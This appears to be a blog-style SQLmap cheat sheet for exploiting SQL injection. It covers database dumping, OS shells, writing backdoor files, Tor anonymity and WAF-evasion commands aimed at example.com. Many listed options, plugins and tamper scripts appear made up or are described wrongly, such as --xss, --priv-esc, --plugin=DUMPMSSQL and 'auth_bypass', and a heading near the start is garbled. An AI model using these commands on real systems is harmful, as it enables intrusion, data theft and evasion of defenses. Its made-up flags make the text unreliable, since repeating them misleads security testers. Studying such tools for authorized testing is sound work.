SQL injection attacks remain a significant threat to web applications, and SQLmap is a powerful tool for detecting and exploiting SQL injection vulnerabilities. However, as web application security measures improve, it’s becoming more challenging to successfully exploit SQL injection vulnerabilities using SQLmap. In response, SQLmap offers a range of evasion techniques that can help bypass web application firewalls (WAFs) and other security measures. This article explores some of the most effective SQLmap evasion techniques and provides practical examples of each technique. Additionally, we’ll provide some tips and best practices for using SQLmap evasion techniques safely and ethically. By using these techniques, security professionals can stay one step ahead of attackers and better protect their web applications from SQL injection attacks.

Basic arguments for SQLmap

Generic Arguments:

  • -u <target_URL>: Specify the target URL to test.
  • --batch: Run SQLmap in batch mode (no user interaction).
  • --crawl=<depth>: Crawl the website up to a specified depth.
  • --crawl-exclude=<exclude>: Exclude URLs that match the specified regex pattern.
  • --forms: Test forms for SQL injection.
  • --threads=<threads>: Set the number of threads to be used in the tests.
  • --timeout=<timeout>: Set the request timeout (in seconds).

Retrieve I

Injection place

nformation Arguments:

  • --current-db: Display the current database name.
  • --dbms=<database_management_system>: Specify the database management system to be targeted.
  • --dbs: Enumerate the databases on the target system.
  • -D <database_name>: Select the database to be used in the tests.
  • --tables: Enumerate the tables in the selected database.
  • -T <table_name>: Select the table to be used in the tests.
  • --columns: Enumerate the columns in the selected table.
  • -C <column_name>: Select the column to be used in the tests.
  • --dump: Dump the data from the selected table or column.

Please note that these are just some of the most commonly used arguments in SQLmap, and there are many more advanced arguments available. It is important to use SQLmap with care and only on systems that you have permission to test.

Injection place

From Burp/ZAP capture:

  • --request-file=<filename>: Load a captured HTTP request from a file (in Burp/ZAP format).
  • --load-cookies=<filename>: Load cookies from a file (in Burp/ZAP format).
  • --load-session=<filename>: Load session data from a file (in Burp/ZAP format).

GET Request Injection:

  • -u <target_URL>: Specify the target URL to test.
  • --data=<data>: Add parameters to the GET request for injection.

POST Request Injection:

  • -u <target_URL>: Specify the target URL to test.
  • --data=<data>: Add parameters to the POST request for injection.
  • --data=<data> --method=PUT: Use the PUT method to send the POST request.

Injections in Headers and other HTTP Methods:

  • -u <target_URL>: Specify the target URL to test.
  • --headers=<headers>: Add headers to the HTTP request for injection.
  • --data=<data> --method=TRACE: Use the TRACE method to send the HTTP request.
  • --data=<data> --method=OPTIONS: Use the OPTIONS method to send the HTTP request.

Indicate string when injection is successful:

  • --string=<string>: Specify a string that indicates successful injection.
  • --not-string=<string>: Specify a string that indicates unsuccessful injection.

Eval:

  • --eval=<command>: Execute a command in the database.

Shell:

  • --os-shell: Drop an interactive operating system shell.
  • --sql-shell: Drop an interactive SQL shell.

Read File:

  • --file-read=<filepath>: Read a file from the database.

Crawl a website with SQLmap and auto-exploit:

  • -u <target_URL>: Specify the target URL to test.
  • --crawl=<depth>: Crawl the website up to a specified depth.
  • --batch: Run SQLmap in batch mode (no user interaction).
  • --level=<level>: Set the level of tests to be performed.

Second Order Injection:

  • --second-order=<request_file>: Test for second-order SQL injection vulnerabilities.
  • --second-order=<request_file> --second-order-test=<true/false>: Specify whether to test for second-order SQL injection vulnerabilities.

Please note that these are just some of the most commonly used injection places with SQLmap, and there are many more advanced injection techniques available. It is important to use SQLmap with care and only on systems that you have permission to test.

Customizing Injection

Set a Suffix:

  • --suffix=<suffix>: Append a suffix to each parameter in the injection.

Set a Prefix:

  • --prefix=<prefix>: Prepend a prefix to each parameter in the injection.

Help Finding Boolean Injection:

  • --technique=T: Specify the injection technique to use (T is a placeholder for the technique number).
  • --string=<string>: Specify a string that indicates successful injection.
  • --not-string=<string>: Specify a string that indicates unsuccessful injection.
  • --skip=<skip>: Skip a specified number of tests at the beginning.

Tamper:

  • --tamper=<tamper_script>: Specify a tamper script to modify the injection payload.
  • --tamper=<tamper_script> --random-agent: Use a random User-Agent string for each request.
  • --tamper=<tamper_script> --hex: Use hexadecimal encoding for the injection payload.
  • --tamper=<tamper_script> --space-to-plus: Replace spaces with plus signs in the injection payload.

Please note that these are just some of the most commonly used customization options with SQLmap, and there are many more advanced options available. It is important to use SQLmap with care and only on systems that you have permission to test.

Database-specific options

SQLmap provides a number of database-specific options that can be used to customize the tool’s behavior based on the type of database being targeted. Some of the most commonly used database-specific options are:

  1. --dbms=<database>: This option is used to specify the database management system (DBMS) being targeted. Supported options include MySQL, PostgreSQL, Oracle, Microsoft SQL Server, and many others.
  2. --dbms-version=<version>: This option is used to specify the version of the DBMS being targeted. This can be useful when attempting to exploit known vulnerabilities in a specific version of the DBMS.
  3. --os=<operating_system>: This option is used to specify the operating system running on the target system. This can be useful for identifying vulnerabilities that are specific to a particular operating system.
  4. --priv-esc: This option is used to enable privilege escalation. If SQLmap is able to identify a vulnerability that allows for privilege escalation, this option will allow it to exploit the vulnerability and escalate privileges on the target system.
  5. --dump: This option is used to dump the contents of the database being targeted. The output can be saved to a file or printed to the console.
  6. --tables: This option is used to list all of the tables in the target database.
  7. --columns: This option is used to list all of the columns in a specified table.
  8. --dump-all: This option is used to dump the contents of all tables in the target database.

It is important to note that not all database-specific options are applicable to all databases. Additionally, the behavior of SQLmap may differ depending on the database being targeted, even when using the same options. Therefore, it is important to understand the behavior of the DBMS being targeted in order to effectively use SQLmap.

Fingerprinting

Fingerprinting is the process of identifying the type, version, and configuration of the database being targeted. SQLmap provides several options for fingerprinting a database, including:

  1. --fingerprint: This option is used to fingerprint the database management system (DBMS) being targeted. SQLmap will send a series of requests to the target in order to identify the DBMS, version, and other information.
  2. --banner: This option is used to display the banner returned by the database server. The banner typically includes information about the DBMS, version, and operating system.
  3. --dbs: This option is used to list all of the databases on the target server. This can be useful for identifying potential targets for further testing.
  4. --tables: This option is used to list all of the tables in a specified database.
  5. --columns: This option is used to list all of the columns in a specified table.
  6. --dump: This option is used to dump the contents of a specified table.
  7. --search: This option is used to search for a specific string in the database.
  8. --os: This option is used to identify the operating system running on the target server.

Fingerprinting can be a useful first step in the testing process, as it can help identify potential vulnerabilities and guide the testing process. However, it is important to note that some DBMSs may be configured to hide or obscure information about the server, making fingerprinting more difficult. Additionally, fingerprinting should only be performed on systems for which the user has explicit permission to test.

Privilege escalation

Privilege escalation refers to the process of gaining additional privileges on a target system beyond those initially granted to the user. SQLmap provides several options for privilege escalation, including:

  1. --priv-esc: This option is used to enable privilege escalation. If SQLmap is able to identify a vulnerability that allows for privilege escalation, this option will allow it to exploit the vulnerability and escalate privileges on the target system.
  2. --os-shell: This option is used to open an interactive shell on the target system. This can be useful for further exploring the system and gaining additional privileges.
  3. --os-pwn: This option is used to open a fully interactive shell on the target system with administrative privileges. This should be used with caution, as it can potentially cause damage to the system.
  4. --sql-shell: This option is used to open an SQL shell on the target system. This can be useful for executing arbitrary SQL commands and potentially gaining additional privileges.
  5. --file-write: This option is used to write a file to the target system. This can be useful for creating backdoors or other tools that can be used for further privilege escalation.

It is important to note that privilege escalation should only be attempted on systems for which the user has explicit permission to test. Additionally, it is important to use caution when escalating privileges, as this can potentially cause damage to the system.

Exploitation of other vulnerabilities

SQLmap can be used to exploit a variety of vulnerabilities beyond just SQL injection. Here are some examples of how SQLmap can be used to exploit other vulnerabilities, divided by category:

File inclusion vulnerabilities

--file-read: This option is used to read a file from the target system. If the target system is vulnerable to file inclusion vulnerabilities, this option can be used to read sensitive files such as configuration files or user data.

--file-write: This option is used to write a file to the target system. If the target system is vulnerable to file inclusion vulnerabilities, this option can be used to create backdoors or other tools that can be used for further exploitation.

Cross-site scripting (XSS) vulnerabilities

--xss: This option is used to test for XSS vulnerabilities on the target website. If an XSS vulnerability is identified, SQLmap can be used to exploit the vulnerability and potentially steal user data or perform other malicious actions.

Remote code execution (RCE) vulnerabilities

--os-shell: This option is used to open an interactive shell on the target system. If the target system is vulnerable to RCE vulnerabilities, this option can be used to execute arbitrary commands on the system.

--os-pwn: This option is used to open a fully interactive shell on the target system with administrative privileges. If the target system is vulnerable to RCE vulnerabilities, this option can be used to take complete control of the system.

Command injection vulnerabilities

--os-shell: This option is used to open an interactive shell on the target system. If the target system is vulnerable to command injection vulnerabilities, this option can be used to execute arbitrary commands on the system.

--os-pwn: This option is used to open a fully interactive shell on the target system with administrative privileges. If the target system is vulnerable to command injection vulnerabilities, this option can be used to take complete control of the system.

It is important to note that exploiting vulnerabilities beyond SQL injection may require additional knowledge and expertise in the relevant area. Additionally, it is important to only attempt exploitation on systems for which the user has explicit permission to test.

Advanced customization options

SQLmap provides a wide range of advanced customization options, which can be used to fine-tune its behavior and improve its effectiveness. Some of the most useful advanced customization options include:

  1. --threads: This option is used to specify the number of threads to use for the scan. By default, SQLmap uses one thread, but increasing the number of threads can speed up the scan and improve performance.
  2. --delay: This option is used to specify the delay between requests, in seconds. This can be useful for avoiding detection by the target website’s security measures.
  3. --random-agent: This option is used to generate a random user agent for each request. This can be useful for avoiding detection by the target website’s security measures.
  4. --tor: This option is used to route all SQLmap traffic through the Tor network. This can be useful for avoiding detection by the target website’s security measures, as well as for maintaining anonymity.
  5. --proxy: This option is used to specify a proxy server to use for the scan. This can be useful for routing traffic through a different IP address or for bypassing firewalls and other security measures.
  6. --tamper: This option is used to specify a tamper script to use during the scan. Tamper scripts are used to modify SQL injection payloads in order to evade detection or bypass security measures.
  7. --level: This option is used to specify the level of detection to use during the scan. By default, SQLmap uses level 1 detection, but increasing the level can improve its effectiveness at finding vulnerabilities.
  8. --risk: This option is used to specify the level of risk to assume during the scan. By default, SQLmap uses a risk level of 1, but increasing the risk level can increase the aggressiveness of the scan and improve its effectiveness.
  9. --dump-all: This option is used to dump all data from the target database. This can be useful for extracting large amounts of data from the target system.

It is important to note that these advanced customization options should be used with caution and only by experienced users who understand the potential implications of modifying SQLmap’s behavior.

Authentication bypass

Authentication bypass is a common attack vector for SQL injection vulnerabilities, as it allows an attacker to gain unauthorized access to protected resources. SQLmap provides several options for bypassing authentication mechanisms, including:

  1. –auth-type: This option specifies the type of authentication mechanism being used by the target application, such as Basic or Digest authentication.
  2. –auth-cred: This option specifies the credentials to be used for authentication, such as a username and password.
  3. –auth-file: This option specifies a file containing a list of credentials to be used for authentication.
  4. –auth-software: This option specifies the software being used to perform authentication, such as Apache or IIS.
  5. –auth-dbms: This option specifies the database management system being used by the target application, which can help SQLmap determine the appropriate authentication bypass technique to use.

In addition to these options, SQLmap also provides a number of tamper scripts that can be used to modify requests and responses in order to bypass authentication mechanisms. Some of these scripts include:

  1. auth_bypass: This script can be used to modify authentication headers in order to bypass Basic or Digest authentication.
  2. space2hash: This script can be used to convert spaces to hash symbols in order to bypass certain authentication mechanisms.
  3. randomcase: This script can be used to randomize the case of letters in order to bypass certain authentication mechanisms that are case-sensitive.

It’s important to note that while SQLmap can be a powerful tool for bypassing authentication mechanisms, it should only be used for ethical purposes and with the permission of the target organization. Unauthorized access to protected resources can lead to serious legal and ethical consequences.

Blind SQL injection

Blind SQL injection is a type of SQL injection attack that does not produce any visible output or error messages, making it more difficult to detect and exploit. Blind SQL injection attacks rely on exploiting vulnerabilities in the database management system that allow an attacker to extract information about the database through a process of trial and error.

SQLmap provides several options for detecting and exploiting blind SQL injection vulnerabilities, including:

  1. –string: This option specifies a string that will be displayed if the injection is successful. This can be used to confirm whether or not the injection was successful without producing any visible output.
  2. –prefix: This option specifies a prefix that will be added to the payload sent to the server. This can be used to manipulate the query in a way that will reveal information about the database.
  3. –suffix: This option specifies a suffix that will be added to the payload sent to the server. This can be used to manipulate the query in a way that will reveal information about the database.
  4. –tamper: This option specifies a tamper script that will be used to modify the payload sent to the server. Tamper scripts can be used to encode and decode payloads in a way that will evade detection by the database management system.
  5. –technique: This option specifies the blind SQL injection technique to be used. SQLmap provides several techniques for detecting and exploiting blind SQL injection vulnerabilities, including boolean-based blind, time-based blind, and error-based blind.

In addition to these options, SQLmap also provides a number of tamper scripts that can be used to modify requests and responses in order to evade detection and bypass security measures. Some of these scripts include:

  1. apostrophemask: This script can be used to encode apostrophes in a way that will evade detection by the database management system.
  2. base64encode: This script can be used to encode payloads using base64 encoding in order to evade detection by the database management system.
  3. space2comment: This script can be used to convert spaces to comments in order to evade detection by the database management system.

It’s important to note that blind SQL injection attacks can be more difficult to detect and exploit than other types of SQL injection vulnerabilities, and can often require more advanced techniques and tools. It’s also important to ensure that any attempts to exploit blind SQL injection vulnerabilities are done ethically and with the permission of the target organization.

Timing-based SQL injection

Timing-based SQL injection is a type of SQL injection attack that relies on manipulating the response time of the database management system in order to extract information about the database. Unlike traditional SQL injection attacks, which rely on visible output or error messages, timing-based SQL injection attacks are designed to be stealthy and avoid detection by the target organization.

SQLmap provides several options for detecting and exploiting timing-based SQL injection vulnerabilities, including:

  1. –time-sec: This option specifies the number of seconds that SQLmap should wait for a response from the server before timing out. This can be used to detect timing-based SQL injection vulnerabilities by sending specially crafted payloads that cause the database management system to take longer to respond.
  2. –time-sec-wait: This option specifies the number of seconds that SQLmap should wait between requests when performing a time-based SQL injection attack. This can be used to control the timing of the attack and avoid triggering security measures that are designed to detect SQL injection attacks.
  3. –technique: This option specifies the time-based SQL injection technique to be used. SQLmap provides several techniques for detecting and exploiting timing-based SQL injection vulnerabilities, including time-based blind and time-based error.

In addition to these options, SQLmap also provides a number of tamper scripts that can be used to modify requests and responses in order to evade detection and bypass security measures. Some of these scripts include:

  1. sleep: This script can be used to insert delays into the SQL injection payloads sent to the server, in order to manipulate the response time of the database management system.
  2. randomcase: This script can be used to randomize the case of the characters in the SQL injection payloads sent to the server, in order to evade detection by the database management system.
  3. space2hash: This script can be used to replace spaces with hash symbols in the SQL injection payloads sent to the server, in order to evade detection by the database management system.

It’s important to note that timing-based SQL injection attacks can be more difficult to detect and exploit than other types of SQL injection vulnerabilities, and can often require more advanced techniques and tools. It’s also important to ensure that any attempts to exploit timing-based SQL injection vulnerabilities are done ethically and with the permission of the target organization.

Hacking web applications with SQLmap

SQLmap is a powerful tool that can be used to identify and exploit SQL injection vulnerabilities in web applications. By automating the process of detecting and exploiting these vulnerabilities, SQLmap can help security professionals to identify and address potential security weaknesses in their applications.

To use SQLmap to hack a web application, the first step is to identify a target application and determine whether it is vulnerable to SQL injection. This can be done using a variety of techniques, including manual testing, scanning tools, and web proxies like Burp Suite or OWASP ZAP.

Once a vulnerable application has been identified, SQLmap can be used to automate the process of exploiting the SQL injection vulnerability. This typically involves specifying the URL of the vulnerable parameter or input field, and then running SQLmap with the appropriate command line options to detect and exploit the vulnerability.

Some of the key steps involved in using SQLmap to hack a web application include:

  1. Identifying a target application and determining whether it is vulnerable to SQL injection.
  2. Specifying the URL of the vulnerable parameter or input field.
  3. Running SQLmap with the appropriate command line options to detect and exploit the vulnerability.
  4. Identifying and exploiting any additional vulnerabilities or weaknesses in the application, such as file inclusion vulnerabilities or cross-site scripting (XSS) vulnerabilities.
  5. Attempting to escalate privileges or gain access to sensitive data by exploiting weaknesses in the application or the underlying database management system.
  6. Documenting and reporting any vulnerabilities or weaknesses that are discovered, and working with the application owners to address and remediate these issues.

It’s important to note that while SQLmap can be a powerful tool for identifying and exploiting SQL injection vulnerabilities, it should only be used ethically and with the permission of the target organization. Hacking web applications without authorization is illegal and can have serious legal consequences.

SQLmap plugins

SQLmap plugins are additional scripts or modules that can be used with SQLmap to extend its functionality or automate specific tasks. Here are some commonly used SQLmap plugins:

  1. DUMPMSACCESS: This plugin is used for dumping data from Microsoft Access databases.
  2. DUMPMSSQL: This plugin is used for dumping data from Microsoft SQL Server databases.
  3. DUMPORACLE: This plugin is used for dumping data from Oracle databases.
  4. DUMPPOSTGRESQL: This plugin is used for dumping data from PostgreSQL databases.
  5. DUMPDB2: This plugin is used for dumping data from IBM DB2 databases.
  6. CSV: This plugin is used to export data in CSV format.
  7. HTML: This plugin is used to export data in HTML format.
  8. JSON: This plugin is used to export data in JSON format.
  9. PDF: This plugin is used to export data in PDF format.
  10. XML: This plugin is used to export data in XML format.
  11. MYSQL AUDIT: This plugin is used to perform an audit of a MySQL database and identify security vulnerabilities.
  12. MYSQL ERRLOG: This plugin is used to parse the MySQL error log and identify SQL injection vulnerabilities.
  13. TAMPERS: This plugin is used to modify the SQLmap requests and responses to evade detection by web application firewalls and other security measures.

These plugins can be used with SQLmap by specifying them with the “–plugin” command-line option. For example, to use the DUMPMSSQL plugin, you would run SQLmap with the command “sqlmap –plugin=DUMPMSSQL”.

SQLmap evasion techniques

SQLmap is a powerful tool for identifying and exploiting SQL injection vulnerabilities, but it’s also important to be able to evade detection by security measures like web application firewalls (WAFs) and intrusion detection systems (IDSs). Here are some SQLmap evasion techniques with practical example code:

  1. Randomization

SQLmap can use random values for parameters to evade signature-based detection. This can be done with the “–random-agent” command-line option. Example: sqlmap -u "http://example.com/search.php?q=test" --random-agent

  1. Obfuscation

SQLmap can obfuscate the SQL injection payload to evade detection. This can be done with the “–tamper” command-line option. Example: sqlmap -u "http://example.com/search.php?q=test" --tamper=space2comment

  1. Fragmentation

SQLmap can fragment the SQL injection payload to evade detection. This can be done with the “–max-chars” and “–suffix” command-line options. Example: sqlmap -u "http://example.com/search.php?q=test" --max-chars=20 --suffix="-"

  1. Encoding

SQLmap can use different encoding techniques to evade detection. This can be done with the “–hex” and “–unicode” command-line options. Example: sqlmap -u "http://example.com/search.php?q=test" --hex

  1. Null bytes

SQLmap can use null bytes in the SQL injection payload to evade detection. This can be done with the “–null-connection” command-line option. Example: sqlmap -u "http://example.com/search.php?q=test" --null-connection

  1. Delayed injection

SQLmap can delay the SQL injection payload to evade detection. This can be done with the “–delay” command-line option. Example: sqlmap -u "http://example.com/search.php?q=test" --delay=5

  1. Avoiding detection

SQLmap can avoid detection by using the “–skip-waf” and “–ignore-401” command-line options. Example: sqlmap -u "http://example.com/search.php?q=test" --skip-waf --ignore-401

These are just a few examples of SQLmap evasion techniques. It’s important to note that these techniques are not foolproof and may not work in all situations. It’s also important to use these techniques responsibly and not use SQLmap to attack systems without permission.

Conclusion

In conclusion, SQLmap evasion techniques can be incredibly useful for security professionals looking to bypass web application firewalls and other security measures in order to successfully exploit SQL injection vulnerabilities. By using a combination of techniques and customizing them to fit specific needs, security professionals can stay ahead of attackers and better protect their web applications from potential SQL injection attacks. However, it’s important to remember to test in a safe environment, keep up-to-date with the latest techniques, and use caution and ethical considerations when using SQLmap and its evasion techniques. Overall, by understanding and using SQLmap evasion techniques effectively, security professionals can better defend against SQL injection attacks and ensure the security and integrity of their web applications.

Shares:

Leave a Reply

Your email address will not be published. Required fields are marked *